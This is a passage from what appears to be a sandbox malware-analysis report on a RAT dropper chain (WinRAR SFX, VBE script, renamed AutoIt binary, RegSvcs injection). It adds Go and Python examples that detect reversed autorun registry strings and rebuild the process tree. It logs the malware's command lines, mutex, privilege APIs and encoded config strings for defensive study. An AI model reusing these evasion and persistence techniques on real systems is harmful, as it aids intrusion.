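The INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse hits above mean the unpacked payload carries autorun registry paths spelled backwards, a cheap way to keep a string such as CurrentVersion\Run out of a plain strings scan; the binary flips the text back at runtime before touching the registry. The following is an added example written for this page, not the ditekSHen rule itself and not code from the report: it implements the same check in Go over a constructed byte blob. The ASEP path list is my own short selection, an assumption rather than the rule's exact string set, and the scan looks for each reversed path in ASCII and in UTF-16LE, which is how a .NET string literal sits in memory (the matched unpacks here are .NET images loaded into RegSvcs.exe).

```go
package main

import (
	"bytes"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Auto-start extensibility points that malware commonly writes to. A reversed copy of
// one of these inside a binary is a string-obfuscation trick: the value is flipped back
// at runtime, so a forward-spelled search never sees it. Assumed list, not the rule's.
var asepKeys = []string{
	`Software\Microsoft\Windows\CurrentVersion\Run`,
	`Software\Microsoft\Windows\CurrentVersion\RunOnce`,
	`Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`,
	`Software\Microsoft\Windows NT\CurrentVersion\Winlogon`,
	`System\CurrentControlSet\Services`,
}

func reverse(s string) string {
	r := []rune(s)
	for i, j := 0, len(r)-1; i < j; i, j = i+1, j-1 {
		r[i], r[j] = r[j], r[i]
	}
	return string(r)
}

// utf16le encodes s the way .NET stores string literals in memory.
func utf16le(s string) []byte {
	u := utf16.Encode([]rune(s))
	b := make([]byte, 2*len(u))
	for i, c := range u {
		b[2*i], b[2*i+1] = byte(c), byte(c>>8)
	}
	return b
}

// asciiLower folds only A-Z, so UTF-16LE NUL bytes and non-ASCII bytes stay untouched.
func asciiLower(b []byte) []byte {
	out := make([]byte, len(b))
	for i, c := range b {
		if c >= 'A' && c <= 'Z' {
			c += 'a' - 'A'
		}
		out[i] = c
	}
	return out
}

// FindReversedASEP returns every ASEP path whose reversed spelling occurs in data,
// as ASCII or as UTF-16LE, compared case-insensitively.
func FindReversedASEP(data []byte) []string {
	hay := asciiLower(data)
	var hits []string
	for _, key := range asepKeys {
		rev := strings.ToLower(reverse(key))
		if bytes.Contains(hay, []byte(rev)) || bytes.Contains(hay, utf16le(rev)) {
			hits = append(hits, key)
		}
	}
	return hits
}

// SampleBinary is a constructed stand-in for an unpacked payload: filler, the Run key
// stored reversed as UTF-16LE, and a forward-spelled path that must not trigger.
func SampleBinary() []byte {
	var b bytes.Buffer
	b.WriteString("MZ\x90\x00constructed filler\x00")
	b.Write(utf16le(reverse(`Software\Microsoft\Windows\CurrentVersion\Run`)))
	b.WriteString("\x00\x00C:\\Windows\\System32\\RegSvcs.exe\x00")
	return b.Bytes()
}

func main() {
	for _, hit := range FindReversedASEP(SampleBinary()) {
		fmt.Println("reversed ASEP string found:", hit)
	}
}
```

Run it against an unpacked image (the raw.unpack artefacts listed above, or a memory dump of RegSvcs.exe) rather than the packed dropper: the AutoIt layer compresses the payload, so the reversed strings only appear once it is unpacked, which is exactly why the hits above are on unpack and MEMORY sources and not on the original sample.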
Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, 6.3.cipkucw.ppt.fb2828.0.raw.unpack, 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack (cSqZGleJeFOouKW.cs) | Base64 encoded strings (the same set is reported for every dump listed; the last string is cut off on the page):
'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
Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, 6.3.cipkucw.ppt.fb2828.0.raw.unpack, 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack (RsIiOhNZgBqD.cs) | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(), System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) (the standard .NET pattern for testing whether the current token holds a built-in role, typically Administrator)
Source: classification engine | Classification label: mal100.troj.evad.winEXE@29/61@0/1
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_0027932C GetLastError,FormatMessageW,_wcslen,LocalFree,0_2_0027932C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0075194F AdjustTokenPrivileges,CloseHandle,6_2_0075194F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00751F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00751F53
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_0102194F AdjustTokenPrivileges,CloseHandle,15_2_0102194F
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_01021F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_01021F53
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00765B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_00765B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0075DC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_0075DC9C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00774089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,6_2_00774089
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_0028EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0028EBD3
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk (the default client mutex name in the public AsyncRAT source; a direct host-based indicator for this family when left unchanged by the operator)
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_03
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Command line argument: 0T, (0_2_0029454A)
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Command line argument: sfxname (0_2_0029454A)
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Command line argument: sfxstime (0_2_0029454A)
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Command line argument: STARTDLG (0_2_0029454A)
Source: yjOJ1YK5M3.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: yjOJ1YK5M3.exe | ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | File read: C:\Users\user\Desktop\yjOJ1YK5M3.exe
Source: unknown | Process created: C:\Users\user\Desktop\yjOJ1YK5M3.exe "C:\Users\user\Desktop\yjOJ1YK5M3.exe"
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt cipkucw.ppt xdgrnj.pdf
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt cipkucw.ppt xdgrnj.pdf
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
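The "Process created" entries above give each child's parent image and command line, which is enough to rebuild the infection chain (WinRAR SFX stub, wscript.exe running a .vbe from %TEMP%, cmd.exe, the AutoIt interpreter renamed cipkucw.ppt, RegSvcs.exe as the injection host) and to write the detections a SOC would want for it. The Python below is an added example, not Joe Sandbox code: it parses lines copied from the report, reconstructs the parent chain, and applies four checks that correspond to signatures in the report header (script interpreter from a suspicious folder, double-extension and document-extension images, a .NET framework utility running outside %WINDIR%\Microsoft.NET, and ipconfig /release or /renew). The extension lists, the script-host and utility names and the %TEMP% pattern are assumptions chosen for the demo.

```python
"""Rebuild the process chain from Joe Sandbox "Process created" lines and flag the
suspicious links. Added example; not Joe Sandbox code. The input lines are copied
from the report above; the allow-lists and path patterns are assumptions."""
import ntpath  # Windows path semantics regardless of the host OS
import re

REPORT_LINES = [
    r'Source: unknownProcess created: C:\Users\user\Desktop\yjOJ1YK5M3.exe "C:\Users\user\Desktop\yjOJ1YK5M3.exe"',
    r'Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe"',
    r'Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release',
    r'Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf',
    r'Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt cipkucw.ppt xdgrnj.pdf',
    r'Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release',
    r'Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew',
    r'Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew',
    r'Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"',
    r'Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe "C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf',
    r'Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"',
]

# The page runs the parent path and the field name together, so the parent group is
# non-greedy; an optional " | " separator is accepted as well.
LINE_RE = re.compile(r"^Source: (?P<parent>.+?)(?: \| )?Process created: (?P<image>\S+) (?P<cmdline>.*)$")

TEMP_DIR = re.compile(r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}           # assumption
DOTNET_UTILITIES = {"regsvcs.exe", "regasm.exe", "installutil.exe"}  # assumption
DOTNET_HOME = "c:\\windows\\microsoft.net\\"
EXEC_EXTS = {"exe", "com", "scr"}
DOC_EXTS = {"ppt", "pptx", "pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


def parse_report(lines):
    """Return (parent_image, child_image, child_cmdline) tuples; skip non-matching lines."""
    records = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            records.append((m["parent"], m["image"], m["cmdline"]))
    return records


def parent_map(records):
    """First-seen parent per child image (no PIDs in these lines, so one entry per path)."""
    parents = {}
    for parent, image, _ in records:
        parents.setdefault(image, parent)
    return parents


def chain_to(image, parents, limit=32):
    """Root-to-leaf list of images ending at `image`; stops at 'unknown' or a cycle."""
    chain = [image]
    while len(chain) < limit:
        parent = parents.get(chain[-1])
        if parent is None or parent == "unknown" or parent in chain:
            break
        chain.append(parent)
    return chain[::-1]


def check_process(parent, image, cmdline):
    """Return (image, reason) pairs for every rule this process trips."""
    name = ntpath.basename(image).lower()
    parts = name.split(".")
    reasons = []
    if name in SCRIPT_HOSTS and TEMP_DIR.search(cmdline):
        reasons.append("script host running a script from %TEMP%")
    if len(parts) > 1 and parts[-1] not in EXEC_EXTS:
        reasons.append(f"process image with non-executable extension .{parts[-1]}")
    elif len(parts) > 2 and parts[-2] in DOC_EXTS:
        reasons.append(f"double extension .{parts[-2]}.{parts[-1]}")
    if name in DOTNET_UTILITIES and not image.lower().startswith(DOTNET_HOME):
        reasons.append("framework utility executed outside %WINDIR%\\Microsoft.NET")
    if name == "ipconfig.exe" and re.search(r"/(release|renew)\b", cmdline, re.IGNORECASE):
        reasons.append(f"network reset: {cmdline}")
    return [(image, r) for r in reasons]


def flag_processes(records):
    findings = []
    for rec in records:
        findings.extend(check_process(*rec))
    return findings


if __name__ == "__main__":
    recs = parse_report(REPORT_LINES)
    parents = parent_map(recs)
    for image, reason in flag_processes(recs):
        path = " -> ".join(ntpath.basename(p) for p in chain_to(image, parents))
        print(f"{reason}: {path}")
```

The three afda\cipkucw.ppt.exe instances have no recorded parent ("unknown"), which is consistent with a persistence mechanism rather than the SFX re-launching them; the chain for those therefore starts at the renamed AutoIt binary itself. Feeding real Sysmon event 1 or Windows 4688 records into the same rules only needs the parser swapped.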
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Sections loaded: version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, windows.fileexplorer.common.dll, apphelp.dll, ntshrui.dll, cscapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, gpapi.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Sections loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, sspicli.dll, windows.storage.dll, wldp.dll, ntmarta.dll, apphelp.dll
Source: C:\Windows\SysWOW64\ipconfig.exe (both the /release and the /renew instance) | Sections loaded: iphlpapi.dll, dhcpcsvc.dll, dhcpcsvc6.dll, dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe (first instance) | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, sspicli.dll, windows.storage.dll, wldp.dll, ntmarta.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe (second and third instance) | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, sspicli.dll, windows.storage.dll, wldp.dll, apphelp.dll
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: yjOJ1YK5M3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: yjOJ1YK5M3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: yjOJ1YK5M3.exe
          Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000C.00000000.1873063732.0000000000BD2000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.6.dr
          Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000C.00000000.1873063732.0000000000BD2000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.6.dr
          Source: Binary string: C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdB source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmp
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: yjOJ1YK5M3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation

